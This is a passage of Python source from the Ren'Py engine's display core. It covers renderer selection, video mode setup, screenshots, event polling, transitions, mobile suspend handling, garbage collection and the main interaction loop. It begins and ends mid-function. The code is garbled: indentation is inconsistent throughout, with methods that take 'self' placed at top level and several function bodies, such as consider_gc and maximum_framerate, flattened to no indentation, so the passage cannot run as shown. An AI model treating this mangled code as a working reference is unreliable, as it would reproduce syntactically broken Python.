    if renderer == "auto":

        if renpy.windows:
            renderers = [ "gl", "angle", "sw" ]
        else:
            renderers = [ "gl", "sw" ]

        if renpy.config.gl2:
            # NOTE(review): "egl2" has no matching make_draw call
            # below, so it is always reported as an unknown renderer -
            # confirm whether a make_draw("egl2", ...) is missing.
            renderers = [ "gl2", "egl2" ] + renderers

    else:
        # Always keep software rendering as a fallback.
        renderers = [ renderer, "sw" ]

    draw_objects = { }

    def make_draw(name, mod, cls, *args):
        # Imports `mod` and instantiates `cls` from it under `name`,
        # returning True on success and False (after logging) on failure.
        if name not in renderers:
            return False

        try:
            __import__(mod)
            module = sys.modules[mod]
            draw_class = getattr(module, cls)
            draw_objects[name] = draw_class(*args)
            return True

        except:
            renpy.display.log.write("Couldn't import {0} renderer:".format(name))
            renpy.display.log.exception()

            return False

    if renpy.windows:
        has_angle = make_draw("angle", "renpy.angle.gldraw", "GLDraw")
    else:
        has_angle = False

    make_draw("gl", "renpy.gl.gldraw", "GLDraw", not has_angle)
    make_draw("gl2", "renpy.gl2.gl2draw", "GL2Draw", "gl2", False)
    make_draw("gles2", "renpy.gl2.gl2draw", "GL2Draw", "gles2", True)
    make_draw("sw", "renpy.display.swdraw", "SWDraw")

    rv = [ ]

    def append_draw(name):
        # Appends the draw object constructed for `name`, if any.
        if name in draw_objects:
            rv.append(draw_objects[name])
        else:
            renpy.display.log.write("Unknown renderer: {0}".format(name))

    for i in renderers:
        append_draw(i)

    return rv
def kill_textures(self):
    """
    Frees the draw object's textures and clears the render and text
    layout caches.
    """

    draw = renpy.display.draw

    if draw is not None:
        draw.kill_textures()

    renpy.display.render.free_memory()
    renpy.text.text.layout_cache_clear()
def kill_textures_and_surfaces(self):
    """
    Kill all textures and surfaces that are loaded.
    """

    # Textures and render caches first...
    self.kill_textures()

    # ...then the image cache and the buffer-object cache.
    renpy.display.im.cache.clear()
    renpy.display.module.bo_cache = None
def set_mode(self, physical_size=None):
    """
    This sets the video mode. It also picks the draw object.

    `physical_size`
        The requested window size in physical pixels, or None to use
        the saved/default size.

    Raises Exception if no renderer can set the video mode.
    """

    # Ensure that we kill off the movie when changing screen res.
    if renpy.display.draw and renpy.display.draw.info["renderer"] == "sw":
        renpy.display.video.movie_stop(clear=False)

    renpy.display.render.free_memory()
    renpy.text.text.layout_cache_clear()
    renpy.display.module.bo_cache = None

    if self.display_reset:

        # Stop any in-progress text input.
        pygame.key.stop_text_input() # @UndefinedVariable
        pygame.key.set_text_input_rect(None) # @UndefinedVariable
        self.text_rect = None

        if renpy.display.draw.info["renderer"] == "angle":
            renpy.display.draw.quit()

            # This is necessary to fix a bug with restoring a window from
            # minimized state on windows.
            pygame.display.quit()

        self.kill_textures_and_surfaces()

        self.old_text_rect = None
        self.display_reset = False

    virtual_size = (renpy.config.screen_width, renpy.config.screen_height)

    if physical_size is None:
        if renpy.mobile or renpy.game.preferences.physical_size is None: # @UndefinedVariable
            physical_size = (None, None)
        else:
            physical_size = renpy.game.preferences.physical_size

    # Setup screen.
    fullscreen = renpy.game.preferences.fullscreen

    old_fullscreen = self.fullscreen
    self.fullscreen = fullscreen

    if os.environ.get('RENPY_DISABLE_FULLSCREEN', False):
        fullscreen = False
        self.fullscreen = renpy.game.preferences.fullscreen

    # Reuse the existing draw object if there is one; otherwise try
    # each candidate renderer in order.
    if renpy.display.draw:
        draws = [ renpy.display.draw ]
    else:
        draws = self.get_draw_constructors()

    for draw in draws:
        if draw.set_mode(virtual_size, physical_size, fullscreen):
            renpy.display.draw = draw
            renpy.display.render.models = draw.info.get("models", False)
            break
        else:
            # pygame.display.quit()
            pass
    else:
        # Ensure we don't get stuck in fullscreen.
        renpy.game.preferences.fullscreen = False
        raise Exception("Could not set video mode.")

    # Save the video size.
    if renpy.config.save_physical_size and not fullscreen and not old_fullscreen:
        renpy.game.preferences.physical_size = renpy.display.draw.get_physical_size()

    if android:
        android.init()

    # We need to redraw the (now blank) screen.
    self.force_redraw = True

    # Assume we have focus until told otherwise.
    self.mouse_focused = True
    self.keyboard_focused = True

    # Assume we're not minimized.
    self.minimized = False

    # Force an interaction restart.
    self.restart_interaction = True

    # True if we're doing a one-time profile.
    self.profile_once = False

    # Clear the frame times.
    self.frame_times = [ ]
def draw_screen(self, root_widget, fullscreen_video, draw):
    """
    Renders the screen from `root_widget` and, if `draw` is true,
    presents it to the window. Also maintains the frame-time history
    and recomputes focus.
    """

    # Run per-frame screen updates, making sure the flag is reset even
    # if one of them raises.
    try:
        renpy.display.render.per_frame = True
        renpy.display.screen.per_frame()
    finally:
        renpy.display.render.per_frame = False

    surftree = renpy.display.render.render_screen(
        root_widget,
        renpy.config.screen_width,
        renpy.config.screen_height,
    )

    if draw:
        renpy.display.draw.draw_screen(surftree, fullscreen_video)

    # Keep a sliding window of recent frame times.
    now = time.time()

    self.frame_times.append(now)

    while (now - self.frame_times[0]) > renpy.config.performance_window:
        self.frame_times.pop(0)

    # Free renders that are no longer reachable.
    renpy.display.render.mark_sweep()

    renpy.display.focus.take_focuses()

    self.surftree = surftree
    self.fullscreen_video = fullscreen_video
def take_screenshot(self, scale, background=False):
    """
    This takes a screenshot of the current screen, and stores it so
    that it can gotten using get_screenshot()

    `scale`
        The (width, height) the screenshot is scaled to.

    `background`
        If true, we're in a background thread. So queue the request
        until it can be handled by the main thread.
    """

    self.clear_screenshot = False

    # Do nothing before the first interaction.
    if not self.started:
        return

    if background and not renpy.emscripten:
        # Ask the main thread to take the screenshot, and block (with a
        # timeout) until it signals completion.
        self.bgscreenshot_event.clear()
        self.bgscreenshot_needed = True

        if not self.bgscreenshot_event.wait(1.0):
            raise Exception("Screenshot timed out.")

        surf = self.bgscreenshot_surface
        self.bgscreenshot_surface = None

    else:

        surf = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)

    surf = renpy.display.scale.smoothscale(surf, scale)

    renpy.display.render.mutated_surface(surf)

    self.screenshot_surface = surf

    # Also keep PNG-encoded data, suitable for storing in save files.
    sio = cStringIO.StringIO()
    renpy.display.module.save_png(surf, sio, 0)
    self.screenshot = sio.getvalue()
    sio.close()
def check_background_screenshot(self):
    """
    Handles a pending screenshot request from another thread, taking
    the screenshot on this (the display) thread and signalling the
    waiting thread when done.
    """

    if not self.bgscreenshot_needed:
        return

    self.bgscreenshot_needed = False
    self.bgscreenshot_surface = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
    self.bgscreenshot_event.set()
def get_screenshot(self):
    """
    Gets the current screenshot, as a string. Returns None if there isn't
    a current screenshot.
    """

    if not self.started:
        self.start()

    rv = self.screenshot

    if not rv:
        # Take a thumbnail-sized screenshot on demand. When called off
        # the display thread, the screenshot must be taken in the
        # background (by the display thread).
        self.take_screenshot(
            (renpy.config.thumbnail_width, renpy.config.thumbnail_height),
            background=(threading.current_thread() is not self.thread),
        )
        rv = self.screenshot
        self.lose_screenshot()

    return rv
def lose_screenshot(self):
    """
    Discards the saved screenshot data and its surface.
    """
    self.screenshot = self.screenshot_surface = None
def save_screenshot(self, filename):
    """
    Saves a full-size screenshot in the given filename.

    Returns True on success, False on failure (unless config.debug is
    set, in which case the exception propagates).
    """

    window = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)

    if renpy.config.screenshot_crop:
        window = window.subsurface(renpy.config.screenshot_crop)

    try:
        renpy.display.scale.image_save_unscaled(window, filename)
        if renpy.emscripten:
            # In the browser, trigger a download of the saved file.
            import emscripten
            emscripten.run_script(r'''FSDownload('%s')''' % filename)
        return True
    except:
        if renpy.config.debug:
            raise

        return False
def show_window(self):
    """
    Shows the empty dialogue window at the start of an interaction,
    when the store, preferences, and configuration call for it.
    """

    if not renpy.store._window:
        return

    if not renpy.game.preferences.show_empty_window:
        return

    # Don't show it twice in one interaction.
    if renpy.game.context().scene_lists.shown_window:
        return

    if renpy.config.empty_window:

        old_history = renpy.store._history # @UndefinedVariable
        renpy.store._history = False

        PPP("empty window")

        try:
            renpy.config.empty_window()
        finally:
            # Showing the empty window must not add a history entry.
            renpy.store._history = old_history
def do_with(self, trans, paired, clear=False):
    """
    Runs an interaction under transition `trans` (possibly adjusted by
    config.with_callback). Returns the interaction's result, or False
    when the transition is absent or suppressed.
    """

    if renpy.config.with_callback:
        trans = renpy.config.with_callback(trans, paired)

    if self.suppress_transition or (not trans):
        self.with_none()
        return False

    self.set_transition(trans)

    return self.interact(trans_pause=True,
                         suppress_overlay=not renpy.config.overlay_during_with,
                         mouse='with',
                         clear=clear)
def with_none(self, overlay=True):
    """
    Implements the with None command, which sets the scene we will
    be transitioning from.

    `overlay`
        If true, the overlay is recomputed before the scene snapshot
        is taken.
    """

    PPP("start of with none")

    renpy.game.context().say_attributes = None

    # Show the window, if that's necessary.
    self.show_window()

    # Compute the overlay.
    if overlay:
        self.compute_overlay()

    scene_lists = renpy.game.context().scene_lists

    # Compute the scene. Layers with a pending transition keep their
    # previous snapshot, so the transition still has a "from" scene.
    for layer, d in self.compute_scene(scene_lists).iteritems():
        if layer not in self.transition:
            self.old_scene[layer] = d

    # Get rid of transient things.
    for i in renpy.config.overlay_layers:
        scene_lists.clear(i)

    scene_lists.replace_transient()
    scene_lists.shown_window = False

    if renpy.store._side_image_attributes_reset:
        renpy.store._side_image_attributes = None
        renpy.store._side_image_attributes_reset = False
def set_transition(self, transition, layer=None, force=False):
    """
    Sets the transition to be performed as part of the next
    interaction on `layer` (None means the global transition). A None
    `transition` clears any pending one. Does nothing while
    transitions are suppressed, unless `force` is true.
    """

    if self.suppress_transition and not force:
        return

    if transition is None:
        self.transition.pop(layer, None)
        return

    self.transition[layer] = transition
def event_peek(self):
    """
    This peeks the next event. It returns None if no event exists.

    A peeked event is remembered in self.pushed_event, so a later
    event_poll/event_wait will return it first.
    """

    if self.pushed_event:
        return self.pushed_event

    ev = pygame.event.poll()

    if ev.type == pygame.NOEVENT:
        # While idle, service pending background screenshot requests.
        self.check_background_screenshot()

        # Seems to prevent the CPU from speeding up.
        renpy.display.draw.event_peek_sleep()
        return None

    self.pushed_event = ev

    return ev
def event_poll(self):
    """
    Polls for a single event, returning a previously pushed-back event
    first. The returned event is recorded as the last event seen.
    """

    if self.pushed_event:
        ev = self.pushed_event
        self.pushed_event = None
    else:
        ev = pygame.event.poll()

    self.last_event = ev

    return ev
def event_wait(self):
    """
    Blocks until an event is available, returning any pushed-back
    event first. Pending background-screenshot requests are serviced
    before blocking. (In its own function so the profiler can track
    time spent waiting in interact.)
    """

    pushed = self.pushed_event

    if pushed:
        self.pushed_event = None
        self.last_event = pushed
        return pushed

    self.check_background_screenshot()

    ev = pygame.event.wait()
    self.last_event = ev

    return ev
def compute_overlay(self):
    """
    Rebuilds the overlay layer by running the configured overlay
    functions (and the window overlay functions, if the window has
    been shown this interaction). Respects store.suppress_overlay.
    """

    if renpy.store.suppress_overlay:
        return

    # Figure out what the overlay layer should look like.
    renpy.ui.layer("overlay")

    for i in renpy.config.overlay_functions:
        i()

    if renpy.game.context().scene_lists.shown_window:

        for i in renpy.config.window_overlay_functions:
            i()

    renpy.ui.close()
def compute_scene(self, scene_lists):
    """
    This converts scene lists into a dictionary mapping layer
    name to a Fixed containing that layer. The None key maps to a
    root Fixed holding the ordinary (non-top) layers.
    """

    rv = dict(
        (layer, scene_lists.make_layer(layer, self.layer_properties[layer]))
        for layer in renpy.config.layers + renpy.config.top_layers)

    root = renpy.display.layout.MultiBox(layout='fixed')
    root.layers = { }

    for layer in renpy.config.layers:
        layer_d = rv[layer]
        root.layers[layer] = layer_d
        root.add(layer_d)

    rv[None] = root

    return rv
def quit_event(self):
    """
    This is called to handle the user invoking a quit.

    A second quit within .75 seconds, or a quit raised while the quit
    action is already running, bypasses the quit action and quits
    immediately (with a save).
    """

    if self.screenshot is None:
        renpy.exports.take_screenshot()

    if self.quit_time > (time.time() - .75):
        renpy.exports.quit(save=True)

    if self.in_quit_event:
        renpy.exports.quit(save=True)

    if renpy.config.quit_action is not None:
        self.quit_time = time.time()

        # Make the screen more suitable for interactions.
        renpy.exports.movie_stop(only_fullscreen=True)
        renpy.store.mouse_visible = True

        # Guard against re-entry while the quit action runs.
        try:
            self.in_quit_event = True
            renpy.display.behavior.run(renpy.config.quit_action)
        finally:
            self.in_quit_event = False

    else:
        renpy.exports.quit(save=True)
def get_mouse_info(self):
    """
    Returns a (hardware, x-offset, y-offset, texture) tuple describing
    how the mouse cursor should be drawn. When the first element is
    true the system cursor is shown; otherwise `texture` (which may be
    None, hiding the cursor) is drawn at the mouse position adjusted
    by the offsets.
    """

    # Figure out if the mouse visibility algorithm is hiding the mouse.
    if (renpy.config.mouse_hide_time is not None) and (self.mouse_event_time + renpy.config.mouse_hide_time < renpy.display.core.get_time()):
        visible = False
    else:
        visible = renpy.store.mouse_visible and (not renpy.game.less_mouse)

    visible = visible and self.show_mouse and not (renpy.display.video.fullscreen)

    # If not visible, hide the mouse.
    if not visible:
        return False, 0, 0, None

    # Deal with a hardware mouse, the easy way.
    if not renpy.config.mouse:
        return True, 0, 0, None

    # Deal with the mouse going offscreen.
    if not self.mouse_focused:
        return False, 0, 0, None

    mouse_kind = renpy.display.focus.get_mouse() or self.mouse

    # Figure out the mouse animation.
    if mouse_kind in renpy.config.mouse:
        anim = renpy.config.mouse[mouse_kind]
    else:
        anim = renpy.config.mouse[getattr(renpy.store, 'default_mouse', 'default')]

    # Pick the animation frame from the 20hz tick counter.
    img, x, y = anim[self.ticks % len(anim)]

    rend = renpy.display.im.load_image(img)

    # Unpack the texture and its offsets from the render's child list.
    tex = rend.children[0][0]
    xo = rend.children[0][1]
    yo = rend.children[0][2]

    return False, x - xo, y - yo, tex
def set_mouse_pos(self, x, y, duration):
    """
    Sets the mouse position. Duration can be a number of seconds or
    None (an immediate move).
    """

    # Schedule the move; the draw loop performs it incrementally.
    self.mouse_move = MouseMove(x, y, duration)
    self.force_redraw = True
def drawn_since(self, seconds_ago):
    """
    Returns true if the screen has been drawn in the last `seconds_ago`
    seconds, and false otherwise.
    """

    elapsed = get_time() - self.frame_time
    return elapsed <= seconds_ago
def check_suspend(self, ev):
    """
    Handles the SDL2 suspend process (mobile app-lifecycle events).

    Returns True if `ev` moved the app into (and back out of) the
    background, and False if it was not a suspend-related event.
    """

    def save():
        # Save game state and persistent data, so being killed while
        # backgrounded doesn't lose progress.
        if renpy.config.save_on_mobile_background and (not renpy.store.main_menu):
            renpy.loadsave.save("_reload-1")

        renpy.persistent.update(True)

    if ev.type == pygame.APP_TERMINATING:
        save()
        sys.exit(0)

    if ev.type != pygame.APP_WILLENTERBACKGROUND:
        return False

    # At this point, we're about to enter the background.

    renpy.audio.audio.pause_all()

    if android:
        android.wakelock(False)

    # Disable the periodic/redraw/time timers while backgrounded.
    pygame.time.set_timer(PERIODIC, 0)
    pygame.time.set_timer(REDRAW, 0)
    pygame.time.set_timer(TIMEEVENT, 0)

    save()

    if renpy.config.quit_on_mobile_background:
        sys.exit(0)

    renpy.exports.free_memory()

    print("Entered background.")

    # Block until we're told to come back to the foreground (or die).
    while True:
        ev = pygame.event.wait()

        if ev.type == pygame.APP_DIDENTERFOREGROUND:
            break

        if ev.type == pygame.APP_TERMINATING:
            sys.exit(0)

    print("Entering foreground.")

    # Since we came back to life, we can get rid of the
    # auto-reload.
    renpy.loadsave.unlink_save("_reload-1")

    pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)

    renpy.audio.audio.unpause_all()

    if android:
        android.wakelock(True)

    # Reset the display so we get the GL context back.
    self.display_reset = True
    self.restart_interaction = True

    return True
def iconified(self):
    """
    Called when the window is minimized to an icon. Idempotent.
    """

    if self.minimized:
        return

    self.minimized = True
    renpy.display.log.write("The window was minimized.")
def restored(self):
    """
    Called when the window is restored from being an icon. Idempotent.
    """

    if not self.minimized:
        return

    self.minimized = False
    renpy.display.log.write("The window was restored.")

    if renpy.windows:
        # This is necessary on Windows/DirectX/Angle, as otherwise we
        # get a blank screen: reset the display to get the context back.
        self.display_reset = True
        self.set_mode(self.last_resize)
def enter_context(self):
    """
    Called when we enter a new context, cancelling any transitions
    that were ongoing in the old one.
    """

    for pending in (self.ongoing_transition, self.transition_from, self.transition_time):
        pending.clear()
def post_time_event(self):
    """
    Posts the shared time_event object to the event queue, silently
    ignoring any failure to do so (e.g. a full queue).
    """

    try:
        pygame.event.post(self.time_event)
    except:
        pass
    def after_longpress(self):
        """
        Called after a longpress, to ignore the mouse button release.
        """

        self.ignore_touch = True
        # (-1, -1) matches the off-screen coordinates used elsewhere in this
        # file when touch events are being ignored.
        renpy.display.focus.mouse_handler(None, -1, -1, default=False)
def text_event_in_queue(self):
"""
Returns true if the next event in the queue is a text editing event.
"""
ev = self.event_peek()
if ev is None:
return False
else:
return ev.type in (pygame.TEXTINPUT, pygame.TEXTEDITING)
    def update_text_rect(self):
        """
        Updates the text input state and text rectangle.

        Starts or stops SDL text input based on whether a text rectangle is
        currently active, and pushes the rectangle to SDL when it changes.
        """

        # The game script can override the text rectangle via this store
        # variable.
        if renpy.store._text_rect is not None: # @UndefinedVariable
            self.text_rect = renpy.store._text_rect # @UndefinedVariable

        if self.text_rect is not None:

            # True when a screen keyboard exists but is not visible, in which
            # case text input is (re)started below to raise it.
            not_shown = pygame.key.has_screen_keyboard_support() and not pygame.key.is_screen_keyboard_shown() # @UndefinedVariable

            if self.old_text_rect != self.text_rect:
                # Map the rectangle through the draw system's coordinate
                # transform before handing it to SDL.
                x, y, w, h = self.text_rect
                x0, y0 = renpy.display.draw.untranslate_point(x, y)
                x1, y1 = renpy.display.draw.untranslate_point(x + w, y + h)
                rect = (x0, y0, x1 - x0, y1 - y0)
                pygame.key.set_text_input_rect(rect) # @UndefinedVariable

            if not self.old_text_rect or not_shown:
                pygame.key.start_text_input() # @UndefinedVariable

        else:
            # No rectangle: stop text input if it was previously active.
            if self.old_text_rect:
                pygame.key.stop_text_input() # @UndefinedVariable
                pygame.key.set_text_input_rect(None) # @UndefinedVariable

        self.old_text_rect = self.text_rect
def maximum_framerate(self, t):
"""
Forces Ren'Py to draw the screen at the maximum framerate for `t` seconds.
"""
if t is None:
self.maximum_framerate_time = 0
else:
self.maximum_framerate_time = max(self.maximum_framerate_time, get_time() + t)
    def interact(self, clear=True, suppress_window=False, trans_pause=False, **kwargs):
        """
        This handles an interaction, restarting it if necessary. All of the
        keyword arguments are passed off to interact_core.

        `clear`
            If true, transient displayables are cleared from the scene lists
            once the interaction finishes.

        `suppress_window`
            If true, the missing window is not shown before the interaction.

        `trans_pause`
            Passed through to interact_core.
        """

        renpy.plog(1, "start of new interaction")

        if not self.started:
            self.start()

        if self.clear_screenshot:
            self.lose_screenshot()

        self.clear_screenshot = False
        self.trans_pause = trans_pause

        # Cancel magic error reporting.
        renpy.bootstrap.report_error = None

        context = renpy.game.context()

        # A nested interaction needs its own context; restarting the current
        # one mid-flight would corrupt its state.
        if context.interacting:
            raise Exception("Cannot start an interaction in the middle of an interaction, without creating a new context.")

        context.interacting = True

        # Show a missing window.
        if not suppress_window:
            self.show_window()

        # These things can be done once per interaction.
        preloads = self.preloads
        self.preloads = [ ]

        try:
            for i in renpy.config.start_interact_callbacks:
                i()

            repeat = True
            self.start_interact = True

            # interact_core returns (repeat, rv); loop until it reports a
            # final result rather than asking for a restart.
            while repeat:
                repeat, rv = self.interact_core(preloads=preloads, trans_pause=trans_pause, **kwargs)
                self.start_interact = False

            return rv

        finally:
            context.interacting = False

            # Clean out transient stuff at the end of an interaction.
            if clear:
                scene_lists = renpy.game.context().scene_lists
                scene_lists.replace_transient()

            self.ongoing_transition = { }
            self.transition_time = { }
            self.transition_from = { }
            self.restart_interaction = True

            renpy.game.context().mark_seen()
            renpy.game.context().scene_lists.shown_window = False

            if renpy.game.log is not None:
                renpy.game.log.did_interaction = True

            # Reset side-image attributes if a reset was requested.
            if renpy.store._side_image_attributes_reset:
                renpy.store._side_image_attributes = None
                renpy.store._side_image_attributes_reset = False
def consider_gc(self):
"""
Considers if we should peform a garbage collection.
"""
if not renpy.config.manage_gc:
return
count = gc.get_count()
if count[0] >= renpy.config.idle_gc_count:
renpy.plog(2, "before gc")
if count[2] >= renpy.config.gc_thresholds[2]:
gen = 2
elif count[1] >= renpy.config.gc_thresholds[1]:
gen = 1
else:
gen = 0
gc.collect(gen)
if gc.garbage:
renpy.memory.print_garbage(gen)
gc.garbage[:] = [ ]
renpy.plog(2, "after gc")
    def idle_frame(self, can_block, expensive):
        """
        Tasks that are run during "idle" frames.

        `can_block`
            True if the caller is able to block waiting for an event.

        `expensive`
            True if more time-consuming idle work (full prediction,
            emscripten preloading) may be performed this frame.
        """

        if expensive:
            renpy.plog(1, "start idle_frame (expensive)")
        else:
            renpy.plog(1, "start idle_frame (inexpensive)")

        # We want this to include the GC time, so we don't predict on
        # frames where we GC.
        start = get_time()

        step = 1

        while True:

            # Stop idle work as soon as a real event shows up.
            if self.event_peek():
                break

            # Unless we may block for a while, budget roughly half a
            # millisecond of idle work per frame.
            if not (can_block and expensive):
                if get_time() > (start + .0005):
                    break

            # Step 1: Run gc.
            if step == 1:
                self.consider_gc()
                step += 1

            # Step 2: Push textures to GPU.
            elif step == 2:
                renpy.display.draw.ready_one_texture()
                step += 1

            # Step 3: Predict more images.
            elif step == 3:

                if not self.prediction_coroutine:
                    step += 1
                    continue

                try:
                    result = self.prediction_coroutine.send(expensive)
                except ValueError:
                    # Saw this happen once during a quit, giving a
                    # ValueError: generator already executing
                    result = None

                # None means prediction is finished. False appears to mean
                # only expensive work remains, so when running inexpensively
                # we move on to the next step — TODO confirm.
                if result is None:
                    self.prediction_coroutine = None
                    step += 1

                elif result is False:
                    if not expensive:
                        step += 1

            # Step 4: Preload images (on emscripten)
            elif step == 4:

                if expensive and renpy.emscripten:
                    renpy.display.im.cache.preload_thread_pass()

                step += 1

            # Step 5: Autosave.
            elif step == 5:

                if not self.did_autosave:
                    renpy.loadsave.autosave()
                    renpy.persistent.check_update()
                    self.did_autosave = True

                step += 1

            else:
                break

        if expensive:
            renpy.plog(1, "end idle_frame (expensive)")
        else:
            renpy.plog(1, "end idle_frame (inexpensive)")
    def interact_core(self,
                      show_mouse=True,
                      trans_pause=False,
                      suppress_overlay=False,
                      suppress_underlay=False,
                      mouse='default',
                      preloads=[],
                      roll_forward=None,
                      ):
        """
        This handles one cycle of displaying an image to the user,
        and then responding to user input.

        @param show_mouse: Should the mouse be shown during this
        interaction? Only advisory, and usually doesn't work.

        @param trans_pause: If given, we must have a transition. Should we
        add a pause behavior during the transition?

        @param suppress_overlay: This suppresses the display of the overlay.
        @param suppress_underlay: This suppresses the display of the underlay.

        @param preloads: Not otherwise used in this method; accepted from
        interact().

        @param roll_forward: The roll-forward data, if any.

        Returns a (restart, result) tuple. When `restart` is true, the
        caller should run the interaction again.
        """

        renpy.plog(1, "start interact_core")

        suppress_overlay = suppress_overlay or renpy.store.suppress_overlay

        # Store the various parameters.
        self.suppress_overlay = suppress_overlay
        self.suppress_underlay = suppress_underlay
        self.trans_pause = trans_pause

        # Show default screens.
        renpy.display.screen.show_overlay_screens(suppress_overlay)

        # Prepare screens, if need be.
        renpy.display.screen.prepare_screens()

        self.roll_forward = roll_forward
        self.show_mouse = show_mouse

        suppress_transition = renpy.config.skipping or renpy.game.less_updates

        # The global one.
        self.suppress_transition = False

        # Figure out transitions.
        if suppress_transition:
            self.ongoing_transition.clear()
            self.transition_from.clear()
            self.transition_time.clear()
        else:
            for k in self.transition:
                if k not in self.old_scene:
                    continue

                self.ongoing_transition[k] = self.transition[k]
                self.transition_from[k] = self.old_scene[k]._in_current_store()
                self.transition_time[k] = None

            self.transition.clear()

        # Safety condition, prevents deadlocks.
        if trans_pause:
            if not self.ongoing_transition:
                return False, None
            if None not in self.ongoing_transition:
                return False, None
            if suppress_transition:
                return False, None
            if not self.old_scene:
                return False, None

        # Check to see if the language has changed.
        renpy.translation.check_language()

        # We just restarted.
        self.restart_interaction = False

        # Setup the mouse.
        self.mouse = mouse

        # The start and end times of this interaction.
        start_time = get_time()
        end_time = start_time

        # frames = 0

        for i in renpy.config.interact_callbacks:
            i()

        # Set the window caption.
        self.set_window_caption()

        # Tick time forward.
        renpy.display.im.cache.tick()
        renpy.text.text.text_tick()
        renpy.display.predict.reset()

        # Clear the size groups.
        renpy.display.layout.size_groups.clear()

        # Clear the set of updated screens.
        renpy.display.screen.updated_screens.clear()

        # Clear some events.
        pygame.event.clear((pygame.MOUSEMOTION,
                            PERIODIC,
                            TIMEEVENT,
                            REDRAW))

        # Add a single TIMEEVENT to the queue.
        self.post_time_event()

        # Figure out the scene list we want to show.
        scene_lists = renpy.game.context().scene_lists

        # Remove the now-hidden things.
        scene_lists.remove_hidden()

        # Compute the overlay.
        if not suppress_overlay:
            self.compute_overlay()

        # The root widget of everything that is displayed on the screen.
        root_widget = renpy.display.layout.MultiBox(layout='fixed')
        root_widget.layers = { }

        # A list of widgets that are roots of trees of widgets that are
        # considered for focusing.
        focus_roots = [ ]

        # Add the underlay to the root widget.
        if not suppress_underlay:
            for i in renpy.config.underlay:
                root_widget.add(i)
                focus_roots.append(i)

        if roll_forward is not None:
            rfw = renpy.display.behavior.RollForward(roll_forward)
            root_widget.add(rfw)
            focus_roots.append(rfw)

        # Figure out the scene. (All of the layers, and the root.)
        scene = self.compute_scene(scene_lists)
        renpy.display.tts.set_root(scene[None])

        renpy.plog(1, "computed scene")

        # If necessary, load all images here.
        for w in scene.itervalues():
            try:
                renpy.display.predict.displayable(w)
            except:
                pass

        renpy.plog(1, "final predict")

        # The root widget of all of the layers.
        layers_root = renpy.display.layout.MultiBox(layout='fixed')
        layers_root.layers = { }

        def add_layer(where, layer):
            # Adds the named layer to `where`, wrapping it in its ongoing
            # transition when one applies.

            scene_layer = scene[layer]
            focus_roots.append(scene_layer)

            if (self.ongoing_transition.get(layer, None) and
                    not suppress_transition):

                trans = self.ongoing_transition[layer](
                    old_widget=self.transition_from[layer],
                    new_widget=scene_layer)

                if not isinstance(trans, Displayable):
                    raise Exception("Expected transition to be a displayable, not a %r" % trans)

                transition_time = self.transition_time.get(layer, None)

                where.add(trans, transition_time, transition_time)
                where.layers[layer] = trans

            else:
                where.layers[layer] = scene_layer
                where.add(scene_layer)

        # Add layers (perhaps with transitions) to the layers root.
        for layer in renpy.config.layers:
            add_layer(layers_root, layer)

        # Add layers_root to root_widget, perhaps through a transition.
        if (self.ongoing_transition.get(None, None) and
                not suppress_transition):

            old_root = renpy.display.layout.MultiBox(layout='fixed')
            old_root.layers = { }

            for layer in renpy.config.layers:
                d = self.transition_from[None].layers[layer]
                old_root.layers[layer] = d
                old_root.add(d)

            trans = self.ongoing_transition[None](
                old_widget=old_root,
                new_widget=layers_root)

            if not isinstance(trans, Displayable):
                raise Exception("Expected transition to be a displayable, not a %r" % trans)

            trans._show()

            transition_time = self.transition_time.get(None, None)
            root_widget.add(trans, transition_time, transition_time)

            if trans_pause:

                if renpy.store._dismiss_pause:
                    sb = renpy.display.behavior.SayBehavior()
                else:
                    sb = renpy.display.behavior.SayBehavior(dismiss='dismiss_hard_pause')

                root_widget.add(sb)
                focus_roots.append(sb)

                pb = renpy.display.behavior.PauseBehavior(trans.delay)
                root_widget.add(pb, transition_time, transition_time)
                focus_roots.append(pb)

        else:
            root_widget.add(layers_root)

        # Add top_layers to the root_widget.
        for layer in renpy.config.top_layers:
            add_layer(root_widget, layer)

        for i in renpy.display.emulator.overlay:
            root_widget.add(i)

        del add_layer

        self.prediction_coroutine = renpy.display.predict.prediction_coroutine(root_widget)
        self.prediction_coroutine.send(None)

        # Clean out the registered adjustments.
        renpy.display.behavior.adj_registered.clear()

        # Clean up some movie-related things.
        renpy.display.video.early_interact()

        # Call per-interaction code for all widgets.
        renpy.display.behavior.input_pre_per_interact()
        root_widget.visit_all(lambda i : i.per_interact())
        renpy.display.behavior.input_post_per_interact()

        # Now, update various things regarding scenes and transitions,
        # so we are ready for a new interaction or a restart.
        self.old_scene = scene

        # Okay, from here on we now have a single root widget (root_widget),
        # which we will try to show to the user.

        # Figure out what should be focused.
        renpy.display.focus.before_interact(focus_roots)

        # Something updated the screens. Deal with it now, so the player doesn't
        # see it.
        if self.restart_interaction:
            return True, None

        # Redraw the screen.
        needs_redraw = True

        # First pass through the while loop?
        first_pass = True

        # We don't yet know when the interaction began.
        self.interact_time = None

        # We only want to do autosave once.
        self.did_autosave = False

        old_timeout_time = None
        old_redraw_time = None

        rv = None

        # Start sound.
        renpy.audio.audio.interact()

        # How long until we redraw.
        _redraw_in = 3600

        # Have we drawn a frame yet?
        video_frame_drawn = False

        # We're no longer after rollback.
        renpy.game.after_rollback = False

        # How many frames have we shown so far?
        frame = 0

        can_block = False

        # This try block is used to force cleanup even on termination
        # caused by an exception propagating through this function.
        try:

            while rv is None:

                renpy.plog(1, "start of interact while loop")

                renpy.execution.not_infinite_loop(10)

                # Check for a change in fullscreen preference.
                if ((self.fullscreen != renpy.game.preferences.fullscreen) or
                        self.display_reset or (renpy.display.draw is None)):

                    self.set_mode()
                    needs_redraw = True

                # Check for autoreload.
                if renpy.loader.needs_autoreload:
                    renpy.loader.needs_autoreload = False
                    renpy.exports.reload_script()

                for i in renpy.config.needs_redraw_callbacks:
                    if i():
                        needs_redraw = True

                # Redraw the screen.
                if (self.force_redraw or
                        ((first_pass or not pygame.event.peek(ALL_EVENTS)) and
                         renpy.display.draw.should_redraw(needs_redraw, first_pass, can_block))):

                    self.force_redraw = False

                    renpy.display.render.process_redraws()

                    # If we have a movie, start showing it.
                    fullscreen_video = renpy.display.video.interact()

                    # Clean out the redraws, if we have to.
                    # renpy.display.render.kill_redraws()

                    self.text_rect = None

                    # Draw the screen.
                    self.frame_time = get_time()

                    renpy.audio.audio.advance_time() # Sets the time of all video frames.

